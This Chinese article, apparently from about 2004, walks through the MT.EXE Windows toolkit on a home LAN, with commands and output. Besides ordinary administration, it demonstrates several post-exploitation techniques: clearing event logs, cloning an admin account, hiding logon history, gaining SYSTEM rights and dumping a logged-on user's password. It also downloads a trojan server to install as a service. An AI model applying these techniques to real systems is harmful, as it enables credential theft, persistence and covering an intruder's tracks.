主機192.168.0.1,操作系統Windows XP 專業版(由於系統經過自己的優化,刪除了很多的功能,所以在測試的時候可能有不正確的地方) 客戶機192.168.0.2,操作系統Windows 2000專業版本,對方是不怎麼懂電腦的人,這個系統也已經用了1年多了,不過還是沒有問題的) 網絡環境:網卡,8029-8139,雙機互連. MT.EXE是一個網絡管理方面的軟件,依照yy3的說法,也就是 "七拼八湊來的,純粹是圖個方便。"可是這個方便個真的是太方便了,有了這40K的一個程序,可以刪除我們電腦裏面多達幾M的程序,讓我們先來看看這個程序的真面目吧: D:\>mt.exe Usage: mt.exe <Opintion> Opintion : -filter ---Change TCP/IP filter to on/off status. -addport ---Add ports to the filter' allowed portlist. -setport ---Set ports as the filter' allowed portlist. -nicinfo ---List TCP/IP interface info. -pslist ---List active processes. -pskill ---Kill a specified process. -dlllist ---List dlls of a specified process. -sysinfo ---List system info. -shutdown ---Shutdown system. -reboot ---Reboot system. -poweroff ---Turn off power. -logoff ---Logoff current user's session. -chkts ---Check Terminal Service info. -setupts ---Install Terminal Service. -remts ---Remove Terminal Service. -chgtsp ---Reset Terminal Service port. -clog ---Clean system log. -enumsrv ---List all services. -querysrv ---List detail info of a specified service. -instsrv ---Install a service. -cfgsrv ---Changes the configuration of a service. -remsrv ---Remove a specified service. -startsrv ---Start a specified service. -stopsrv ---Stop a specified service. -netget ---Download from http/ftp. -redirect ---Port redirect. -chkuser ---List all account、sid and anti clone. -clone ---Clone from admin to dest. -never ---Set account looks like never logged on. -killuser ---Del account. Even "guest" account. -su ---Run process as Local_System privilege. -findpass ---Show all logged on user's pass. -netstat ---List TCP connections. -killtcp ---Kill TCP connection. -psport ---Map ports to processes. -touch ---Set the file times for a specified file. -secdel ---Secure delete files and directory or zap free pace. -regshell ---Enter a console registry editor. -chkdll ---Detect gina dll backdoor. 大家可以看見的是,.他的功能一共有34項,包含我們我們平時使用的大部分軟件.下面我就來一項一項的測試,條件和能力有限,希望大家能夠指出其中的不足. 一,MT.EXE –filter Usage: MT -filter <ON|OFF> ----Enabld|Disable TCP/IP Filter. 從上面的說明可以知道,這個是打開關閉TCP/IP篩選的,我們先來試一下,輸入命令: D:\>MT -FILTER on Enable TCP/IP Filter successful! 這個時候我們看看試不試打開了TCP/IP篩選,打開網絡連接選項,右鍵本地連接---Internet協議(TCP/IP)屬性----高級---選項----TCP/IP篩選-----屬性,我們看到的這樣的情況,如圖: 可以看見,我們已經啓用了這個TCP/IP篩選,再次輸入命令: D:\>MT -FILTER off Disable TCP/IP Filter successful! 查看屬性: 有了這個工具,我們就不必那樣的麻煩的點擊鼠標了,一切都很簡單. 二, D:\>mt -addport Usage: mt -addport <TCP|UDP> NIC PortList ----Add ports to the allowed portlist. Use "-nicinfo" get Nic number first. 從說明上面看,是增加端口列表中允許通訊的端口,還是和上面的一樣,我們來看看這個功能是如何的強大: 五, -pslist ---List active processes. 列出活動進程,經常用PSTOOLS的很熟悉這個功能了,在這裏,我將這個工具和pstools的工具相比較,看看他們的功能怎麼樣? D:\>mt -pslist PID Path 0 [Idle Process] 4 l[System] 464 \SystemRoot\System32\smss.exe 524 \??\C:\WINDOWS\system32\csrss.exe 548 \??\C:\WINDOWS\system32\winlogon.exe 592 C:\WINDOWS\system32\services.exe 604 C:\WINDOWS\system32\lsass.exe 780 C:\WINDOWS\system32\svchost.exe 844 C:\WINDOWS\System32\svchost.exe 876 C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe 932 C:\WINDOWS\System32\svchost.exe 960 C:\WINDOWS\System32\svchost.exe 1128 C:\WINDOWS\System32\alg.exe 1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe 1188 D:\mysql\bin\mysqld-nt.exe 1280 C:\WINDOWS\System32\nvsvc32.exe 1728 C:\WINDOWS\Explorer.EXE 212 C:\WINDOWS\System32\ctfmon.exe 504 D:\Program Files\Microsoft Office\Office10\WINWORD.EXE 924 D:\Program Files\MYIE2\myie.exe 1348 C:\WINDOWS\System32\dllhost.exe 1516 C:\WINDOWS\System32\dllhost.exe 1856 C:\WINDOWS\System32\msdtc.exe 1356 C:\WINDOWS\System32\cmd.exe 1004 C:\WINDOWS\System32\conime.exe 1748 D:\Program Files\HyperSnap-DX 5\HprSnap5.exe 1272 D:\MT.exe 我們使用PSLIST得到的結果: D:\hack>pslist PsList v1.12 - Process Information Lister Copyright (C) 1999-2000 Mark Russinovich Systems Internals - http://www.sysinternals.com Process information for LIN: Name Pid Pri Thd Hnd Mem User Time Kernel Time Elapsed Time Idle 0 0 1 0 20 0:00:00.000 0:40:22.453 0:00:00.000 System 4 8 56 258 40 0:00:00.000 0:00:06.098 0:00:00.000 smss 464 11 3 21 44 0:00:00.010 0:00:00.100 0:43:10.565 csrss 524 13 11 416 3892 0:00:02.042 0:00:14.240 0:43:06.449 winlogon 548 13 19 443 1044 0:00:01.171 0:00:01.882 0:43:04.185 services 592 9 21 307 940 0:00:00.721 0:00:01.662 0:43:01.582 lsass 604 9 19 304 1132 0:00:00.540 0:00:00.690 0:43:01.532 svchost 780 8 8 255 824 0:00:00.200 0:00:00.160 0:42:58.687 svchost 844 8 55 1214 5740 0:00:02.393 0:00:01.932 0:42:58.457 StyleXPSer 876 8 2 38 416 0:00:00.110 0:00:00.070 0:42:58.357 svchost 932 8 5 46 396 0:00:00.020 0:00:00.040 0:42:56.705 svchost 960 8 7 90 204 0:00:00.060 0:00:00.040 0:42:56.244 alg 1128 8 5 116 220 0:00:00.020 0:00:00.060 0:42:49.144 inetinfo 1160 8 17 281 864 0:00:00.210 0:00:00.330 0:42:49.054 mysqld-nt 1188 8 6 81 76 0:00:00.010 0:00:00.050 0:42:47.602 nvsvc32 1280 8 3 74 92 0:00:00.090 0:00:00.160 0:42:45.378 Explorer 1728 8 20 583 19548 0:00:11.436 0:00:27.519 0:42:37.607 ctfmon 212 8 1 109 1596 0:00:00.340 0:00:01.031 0:42:26.982 WINWORD 504 8 5 394 43428 0:01:04.072 0:00:25.757 0:41:26.194 myie 924 8 9 312 3116 0:00:09.623 0:00:07.460 0:35:36.582 dllhost 1348 8 23 240 1540 0:00:01.982 0:00:00.460 0:35:24.414 dllhost 1516 8 15 200 784 0:00:00.190 0:00:00.230 0:35:22.912 msdtc 1856 8 18 149 372 0:00:00.080 0:00:00.090 0:35:18.896 cmd 1356 8 1 21 592 0:00:00.080 0:00:00.100 0:32:44.414 conime 1004 8 1 25 664 0:00:00.050 0:00:00.030 0:32:42.652 HprSnap5 1748 8 6 168 1648 0:00:01.932 0:00:03.414 0:18:38.798 cmd 1548 8 1 20 1392 0:00:00.020 0:00:00.010 0:00:28.020 pslist 1716 8 2 82 1672 0:00:00.030 0:00:00.050 0:00:00.400 使用PULIST得到的結果: E:\HACK>pulist Process PID User Idle 0 System 4 smss.exe 464 NT AUTHORITY\SYS csrss.exe 524 NT AUTHORITY\SYS winlogon.exe 548 NT AUTHORITY\SYS services.exe 592 NT AUTHORITY\SYS lsass.exe 604 NT AUTHORITY\SYS svchost.exe 780 NT AUTHORITY\SYS svchost.exe 844 NT AUTHORITY\SYS StyleXPService.exe 876 NT AUTHORITY\SY svchost.exe 932 svchost.exe 960 alg.exe 1128 inetinfo.exe 1160 NT AUTHORITY\SYS mysqld-nt.exe 1188 NT AUTHORITY\SYS nvsvc32.exe 1280 NT AUTHORITY\SYS Explorer.EXE 1728 LIN\lin ctfmon.exe 212 LIN\lin WINWORD.EXE 504 LIN\lin MyIE.exe 924 LIN\lin dllhost.exe 1348 dllhost.exe 1516 NT AUTHORITY\SYS msdtc.exe 1856 cmd.exe 1356 LIN\lin conime.exe 1004 LIN\lin HprSnap5.exe 1748 LIN\lin cmd.exe 1548 LIN\lin pulist.exe 1788 LIN\lin 從上面的情況可以知道,輸入MT還沒有PSLIST功能的強大,能夠列出Name,Pid,Pri,Thd Hnd,Mem,User Time,Kernel Time,Elapsed Time,但是較於PULIST,已經是很好的了,能夠列出進程名和運行路徑,已經能夠滿足我們平時的使用了. 六, D:\>mt -pskill Usage: mt -pskill <PID|ProcessName> 同樣也是PSTOOLS的工具之一了,我們使用MyIE.exe這個軟件作爲測試,看看他們能不能殺死這個進程,首先是使用MT,通過上面的MT –PSLIST,我們知道MyIE.exe的PID值是924,於是輸入: D:\>mt -pskill 924 Kill process sccuessful! 很快,MYIE就消失了,也就是被KILL了,再使用PSKILL.EXE,我們表示公平統一性,我們還是有PSLIST取得MYIE的PID值,重新打開MYIE,得到它的PID值爲220,我們輸入: D:\hack>pskill 220 PsKill v1.03 - local and remote process killer Copyright (C) 2000 Mark Russinovich http://www.sysinternals.com Process 220 killed. 同樣也是很快被KILL,說明MT和PSKILL的功能是一樣的,使用MT也可以達到和PSKILL一樣的效果. 我們發現MT一個比較弱的功能的就是沒有和PSKILL一樣支持網絡功能,在PSKILL中可以通過pskill [\\RemoteComputer [-u Username]] <process Id or name> -u Specifies optional user name for login to remote computer. 殺死遠程的計算機進程,當然,我們不可能指望MT也能有這樣強大的功能,畢竟我們用的僅僅才只有40K. 七, D:\>mt -dlllist Usage: mt -dlllist <PID|ProcessName> 列出進程中相關的DLL文件,於這個相關功能的軟件我沒有找到,不過我們使用Windows優化大師,我們先來測試一下,這次我們選中的進程是StyleXPService.exe.還是使用MT –pslist得到其PID值876,輸入: D:\>mt -dlllist 876 C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe C:\WINDOWS\System32\ntdll.dll C:\WINDOWS\system32\kernel32.dll C:\WINDOWS\system32\USER32.dll C:\WINDOWS\system32\GDI32.dll C:\WINDOWS\system32\ADVAPI32.dll C:\WINDOWS\system32\RPCRT4.dll C:\WINDOWS\system32\ole32.dll C:\WINDOWS\system32\OLEAUT32.dll C:\WINDOWS\system32\MSVCRT.DLL C:\WINDOWS\system32\VERSION.dll C:\WINDOWS\System32\SETUPAPI.dll C:\WINDOWS\System32\NETAPI32.dll C:\WINDOWS\System32\IMM32.DLL C:\WINDOWS\System32\LPK.DLL C:\WINDOWS\System32\USP10.dll C:\WINDOWS\System32\UXTHEME.DLL C:\WINDOWS\System32\rsaenh.dll 打開Windows優化大師,看看它得到的相關DLL文件是什麼?如圖: 使用MT得到的DLL相關文件和Windows優化大師的是一摸一樣的,我們可以肯定使用MT絕對比使用Windows優化大師方便快捷. 八, mt –sysinfo 列出系統信息,還是使用Windows優化大師與之作比較,發現幾乎沒有任何的失誤,可見準確性特別強的,由於頁面的關係,數據不再展示. 這個功能和程序sysinfo.exe是一樣的. 九, -shutdown ---Shutdown system. -reboot ---Reboot system. -poweroff ---Turn off power. -logoff ---Logoff current user's session. 這4個命令就不說了,和系統工具shutdown不一樣的是,輸入之後沒有任何的提示,直接關機,我已經試過了,幸虧還記得保存. 十, -chkts ---Check Terminal Service info. -setupts ---Install Terminal Service. -remts ---Remove Terminal Service. -chgtsp ---Reset Terminal Service port. 這4個命令是和Terminal相關的,由於沒有安裝服務器版本的系統,所以沒有測試. 十一, -clog ---Clean system log. 用來清除記錄,我們輸入: D:\>mt -clog Usage: mt -clog <app|sec|sys|all> ---Clean Application|Security|System|All logs. 從上面的可以看出,我們可以清除 "應用程序" "安全性" "系統"3個日誌,我隨便選擇一個,用MT刪除 "應用程序"日誌,輸入: D:\>mt -clog app Clean EventLog : Application successful! 打開事件查看器,如圖, 可以看出日誌已經被清空,不過MT並不能和小榕的Cleariislog相比,不能刪除指定IP的日誌,這個可能是yy3並沒有考慮將這個工具用作那樣的用途. 十二, -enumsrv ---List all services. 列出所有的服務,這個測試可能你的不同,因爲我已經刪除了很多的服務的了,爲了精簡系統和提升速度,還是來看看, D:\>mt -enumsrv Usage: mt -enumsrv <SRV|DRV> ----List all Win32|Driver Service D:\>mt -enumsrv srv Num ServiceName DisplayName 0 Alerter Alerter 1 ALG Application Layer Gateway Service 2 AppMgmt Application Management 3 aspnet_state ASP.NET State Service 4 AudioSrv Windows Audio (省略以下大部分的內容) D:\>mt -enumsrv drv Num ServiceName DisplayName 0 Abiosdsk Abiosdsk 1 abp480n5 abp480n5 2 ACPI Microsoft ACPI Driver 3 ACPIEC ACPIEC 4 adpu160m adpu160m 5 aec Microsoft Kernel Acoustic Echo Canceller 6 AFD AFD 網絡支持環境 7 Aha154x Aha154x 8 aic78u2 aic78u2 (省略以下大部分的內容) 實在是太多了,也不想說什麼了,只有一個字----高. 十三, D:\>mt -querysrv Usage: mt -querysrv <ServiceName> ----Show detial info of a specifies service. 列出服務的詳細信息,我們查看系統進程Alerter的信息,輸入: D:\>mt -querysrv Alerter ServiceName: Alerter Status: Stopped ServiceType: Win32 Share Service Start type: Demand Start LogonID: NT AUTHORITY\LocalService FilePath : C:\WINDOWS\System32\svchost.exe -k LocalService DisplayName: Alerter Dependency: LanmanWorkstation Description: 通知所選用戶和計算機有關係統管理級警報。如果服務停止,使用管理警 報的程序將不會受到它們。如果此服務被禁用,任何直接依賴它的服務都將不能啓動。Start type: Demand Start LogonID: NT AUTHORITY\LocalService FilePath : C:\WINDOWS\System32\alg.exe DisplayName: Application Layer Gateway Service Dependency: Description: 爲 Internet 連接共享和 Internet 連接防火牆提供第三方協議插件的支 持 實在是很清楚了,當然我們也可以使用mmc查看服務的詳細信息,如圖: 再一次看見這個參數了,上次已經忘記的了. 十四, -instsrv ---Install a service. -cfgsrv ---Changes the configuration of a service. -remsrv ---Remove a specified service. -startsrv ---Start a specified service. -stopsrv ---Stop a specified service. 這寫命令四和服務相關的,放在一起測試了,服務程序選擇了冰河的服務端server.exe,我現在要作的是將這個工具作爲服務安裝,然後改變配置,開始服務,停止服務等,輸入: 十五, D:\>mt -netget Usage: mt -netget <url> <filename to saved> ---Download from http/ftp. 這個工具很是實用,直到幾個月前,還在安全焦點的論壇上面看見有人需要這樣的工具,不過那個時候他們提供的是VBS文件,可惜我現在已經找不到那些代碼了,在DOS下下載軟件的東西,特別的方便.打建IIS服務器,把server.exe文件放置在根目錄下面,在DOS下面輸入 D:\>mt -netget http://192.168.0.1/server.exe f:\server.exe Download File from http://192.168.0.1/server.exe to f:\server.exe. Download completed 272992 bytes ...... Downloaded 266.6KB @266.6KB/S in 0sec. File <f:\server.exe> TotalByte : 266 KB. 將下載回來的server.exe文件保存在F盤server.exe文件. 十六, D:\>mt -redirect Usage: mt -redirect <TargetIP> <TargetPort> <ListenPort> ----TCP port redirector. 這個功能和FPIPE是一樣的,實現端口轉換,我們這樣測試,將192.168.0.1主機的80端口轉化爲81端口,這樣輸入: D:\>mt -redirect 192.168.0.1 80 81 ------Waiting Connection----- 然後另外開一個CMD,telnet到192.168.0.1的81端口,看到這樣的情況,第一個CMD顯示出了連接的信息, D:\>mt -redirect 192.168.0.1 80 81 ------Waiting Connection----- Accept client==>192.168.0.1:3027 connect to 192.168.0.1 80 success! Thread 1988 recv 2 bytes. Thread 1988 send 2 bytes. Thread 1988 recv 2 bytes. Thread 1988 send 2 bytes. Thread 316 recv 224 bytes. Thread 316 send 224 bytes. 而第二個CMD也顯示出了我們需要得到的信息: HTTP/1.1 400 Bad Request Server: Microsoft-IIS/5.1 Date: Wed, 19 May 2004 13:28:53 GMT Content-Type: text/html Content-Length: 87 <html><head><title>Error</title></head><body>The parameter is incorrect. </body> </html> 不過這個功能有一點不穩定,也就是說,有時候可以,有時候又不可以,這次的成功也是重新啓動以後纔出現的,相對於FPIPE,是方便了很多了,置於FPIPE.exe的用法,實在是讓我頭痛了幾天. 17, D:\>mt -clone Usage: mt -clone <SourUser> <DestUser> 克隆賬號,有點象小榕的cloneuser,測試一下,新建一個用戶yun,現在我要將管理員賬號lin克隆爲賬號yun,輸入: D:\hack>mt -clone lin yun Fail to Open SAM Key, 操作成功完成。 D:\>mt -clone lin yun Fail to Open SAM Key, 操作成功完成。 可能是不支持XP系統,雖然提示說操作成功,可是事實上,使用yun登陸的時候,還是沒有成功,可能也是有其缺陷或者是我自己操作失敗吧. 18, D:\>mt -never -never ---Set account looks like never logged on. 它可以設置使用戶看起來從來沒有登陸過,在我的系統裏面有2個用戶,一個是管理員lin,另外一個是公用的帳戶316,現在我把316設置爲從不登陸的狀態.輸入 D:\>mt -never 316 Require System Privilege.提示沒有權限,於是 D:\>mt -su 打開新的CMD窗口,輸入 Microsoft Windows XP [版本 5.1.2600] (C) 版權所有 1985-2001 Microsoft Corp. C:\WINDOWS\system32>d: D:\>mt -never 316 Fail to Set F Value. D:\>net user 316 用戶名 316 全名 316 註釋 用戶的註釋 國家(地區)代碼 000 (系統默認值) 帳戶啓用 Yes 帳戶到期 從不 上次設置密碼 2004/5/19 下午 08:22 密碼到期 從不 密碼可更改 2004/5/19 下午 08:22 需要密碼 Yes 用戶可以更改密碼 Yes 允許的工作站 All 登錄腳本 用戶配置文件 主目錄 上次登錄 從不 可允許的登錄小時數 All 本地組成員 *Users 全局組成員 *None 命令成功完成。 D:\> 可以看出來已經修改成功了,雖然顯示的是Fail to Set F Value.,但還是成功了.這個功能和never.exe是一樣的,只是將特定的的帳戶上回登陸時間改爲帳戶從來沒有登陸上過系統. 成功條件:你要有local system權限 18, -killuser ---Del account. Even "guest" account. 刪除用戶,輸入D:\>mt -killuser ziqi Kill User: ziqi Success! 這個功能有一點問題,輸入提示已經刪除了,可是然後事實上,這個用戶並沒有刪除,我們輸入 D:\>net user \\LIN 的用戶帳戶 ------------------------------------------------------------------------------- 316 Administrator ASPNET Guest HelpAssistant IUSR_IMAGE IWAM_IMAGE lin SUPPORT_388945a0 ziqi 命令成功完成。 還是能夠看見ziqi的賬號,打開控制面板,用戶賬號,還是能看見這個用戶的身影: 但是如果我們以下面這種方式登陸,也就是先運行MT –su得到系統最高權限,在這個CMD下,我們就可以刪除賬號了,同時也可以刪除GUEST用戶,雖然我還沒有激活這個賬號,不知道是什麼原因,因爲我本身登陸的就已經是administrator組了.刪除GUEST的過程: D:\>mt -killuser guest Kill User: guest Success! D:\>net user \\ 的用戶帳戶 ------------------------------------------------------------------------------- 316 Administrator ASPNET HelpAssistant IUSR_IMAGE IWAM_IMAGE lin SUPPORT_388945a0 yun 命令運行完畢,但發生一個或多個錯誤。 19, -su ---Run process as Local_System privilege. 以系統特權運行進程,在管理員登陸的情況下輸入MT –su,馬上彈出另外一CMD窗口,在這個窗口中,可以做任何我們想做的事情,這個也是系統的最高權限了. 20 -regshell ---Enter a console registry editor. 以CMD的方式編輯註冊表,輸入在CMD下不是很方便,不過有時候也是很使用的,輸入: D:\>mt -regshell HKLM\>dir <SubKey> HARDWARE <SubKey> SAM <SubKey> SECURITY <SubKey> SOFTWARE <SubKey> SYSTEM Total: 5 SubKey, 0 Value. HKLM\>quitreg D:\> 和真實環境沒有什麼區別. 21, -netstat ---List TCP connections. 列出所有的TCP連接,我讓192.168.0.2打開IE,訪問192.168.0.1的主頁,然後輸入: D:\>mt -netstat Num LocalIP Port RemoteIP PORT Status 11 192.168.0.1 80 192.168.0.2 1050 Established 如果使用的是系統自帶的netstat,得到的結果是一樣的: D:\>netstat Active Connections Proto Local Address Foreign Address State TCP LIN:http 192.168.0.2:1050 ESTABLISHED 只是使用MT能夠更直接,更容易理解,比如使用端口80代替使用協議HTTP. 22, D:\>mt -killtcp Usage: mt -killtcp <ConnectionNum> ----Kill a specifies TCP connection. 和上面的搭配用,如果先KILL192.168.0.2對本機(192.168.0.1)的連接,可以輸入: D:\>mt -killtcp 11 Waiting connection to be close now. 這個時候再輸入: D:\>mt -netstat Num LocalIP Port RemoteIP PORT Status D:\> 已經看不到有它的連接了. 23, -chkdll ---Detect gina dll backdoor. 檢查gina***後門,這個問題以前是很流行了,所以也被考慮進來了,使用很簡單: D:\>mt -chkdll GinaDll not found. Winlogon Notification Package Dll: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain crypt32.dll HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet cryptnet.dll HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cscdll cscdll.dll HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp wlnotify.dll HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Schedule wlnotify.dll HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy sclgntfy.dll HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SensLogn WlNotify.dll HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\termsrv wlnotify.dll HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlballoon wlnotify.dll Please make sure if they were backdoors. 如果我安裝了GINA***,會出現這樣的情況: D:\>mt -chkdll GinaDll exist: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDll c:\windows\system32\ntshellgina.dll 很快就被檢測出來了,實在是很方便,呵呵,其實我那個DLL文件早就被KILL了,只是修改了一下註冊表而已,不過也顯示了這個工具的強大性. 24, -psport ---Map ports to processes. 顯示進程的端口,這個功能和哪個工具的功能一樣的呢,呵呵,忘記了,對了是FPORT.EXE,呵呵,很久沒有用了,還是來看看他們有什麼不同的地方: D:\>mt -psport Proto Listen PID Path TCP 0.0.0.0:80 1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe TCP 0.0.0.0:135 780 C:\WINDOWS\system32\svchost.exe TCP 0.0.0.0:443 1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe TCP 0.0.0.0:1025 1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe TCP 0.0.0.0:1026 4 [System] TCP 0.0.0.0:3025 960 C:\WINDOWS\System32\svchost.exe TCP 0.0.0.0:3027 1252 C:\WINDOWS\System32\msdtc.exe TCP 0.0.0.0:3306 1176 D:\mysql\bin\mysqld-nt.exe TCP 127.0.0.1:3001 1120 C:\WINDOWS\System32\alg.exe TCP 127.0.0.1:3002 844 C:\WINDOWS\System32\svchost.exe TCP 127.0.0.1:3003 844 C:\WINDOWS\System32\svchost.exe TCP 192.168.0.1:139 4 [System] TCP 192.168.0.1:3011 4 [System] UDP 0.0.0.0:500 1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe UDP 0.0.0.0:3456 780 C:\WINDOWS\system32\svchost.exe UDP 127.0.0.1:3020 1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe UDP 127.0.0.1:3026 1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe UDP 192.168.0.1:137 4 [System] UDP 192.168.0.1:138 960 C:\WINDOWS\System32\svchost.exe 使用FPORT.EXE得到下面的結果 E:\HACK>fport /ap FPort v2.0 - TCP/IP Process to Port Mapper Copyright 2000 by Foundstone, Inc. http://www.foundstone.com Pid Process Port Proto Path 1120 -> 3001 TCP 960 -> 3025 TCP 1252 -> 3027 TCP 4 System -> 1026 TCP 4 System -> 139 TCP 4 System -> 3011 TCP 1160 inetinfo -> 1025 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe 1160 inetinfo -> 443 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe 1160 inetinfo -> 80 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe 844 svchost -> 3002 TCP C:\WINDOWS\System32\svchost.exe 844 svchost -> 3003 TCP C:\WINDOWS\System32\svchost.exe 780 svchost -> 135 TCP C:\WINDOWS\system32\svchost.exe 1176 mysqld-nt -> 3306 TCP D:\mysql\bin\mysqld-nt.exe 960 -> 138 UDP 4 System -> 137 UDP 1160 inetinfo -> 3020 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe 1160 inetinfo -> 3026 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe 1160 inetinfo -> 500 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe 780 svchost -> 3456 UDP C:\WINDOWS\system32\svchost.exe 基本上差不多了,不過感覺好像FPORT更加強大一點,因爲我現在在FPORT中用了參數,爲了使2個更容易對比一些. 這裏還有一個比較好的軟件,使GUI的,抓圖下來如下: 24, -touch ---Set the file times for a specified file. 查看文件修改時間,下載或者COPY,轉移會改變文件的最後修改時間,而使用這個命令可以查看文件的最後修改時間,舉個例子,我們現在看到的文件mt.exe,如圖, 而事實上,我們使用下面的命令: D:\>mt -touch mt1.exe Set FileTime Successful. CreationTime : 07/10/2002 LastAccessTime : 19/05/2004 LastWriteTime : 07/10/2002 可以知道其創建時間不使2004年5月19日,而是CreationTime : 07/10/2002,相信這個也就使yy3寫這個程序的時間了.與這個相關的軟件有偷touch.exe,可以我電腦裏面的這個文件已經本病毒破壞了。 25, -chkuser ---List all account、sid and anti clone. 這個功能,測試不了,雖然說使列出所有的用戶,SID和反克隆設置,但是,一旦輸入,就有錯誤發生 26, -findpass ---Show all logged on user's pass. 得到所有登陸用戶的密碼,由於這個命令是For NT/2K only.,所以我在客戶機上面測試這個功能,輸入,很容易就得到了密碼: G:\WINNT\system32>mt -findpass mt -findpass The logon information : Domain : 316-2AS8L1B1FL5 Username : Administrator Password : winyaj G:\WINNT\system32> 這個比findpass.exe還方便一些,不需要知道用戶進程的PID值. 後記:MT確實是一個很不錯的工具,它能夠讓我們很容易的做很多事情,而不用到處去找相關的軟件 |
MT.EXE 使用全攻略
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.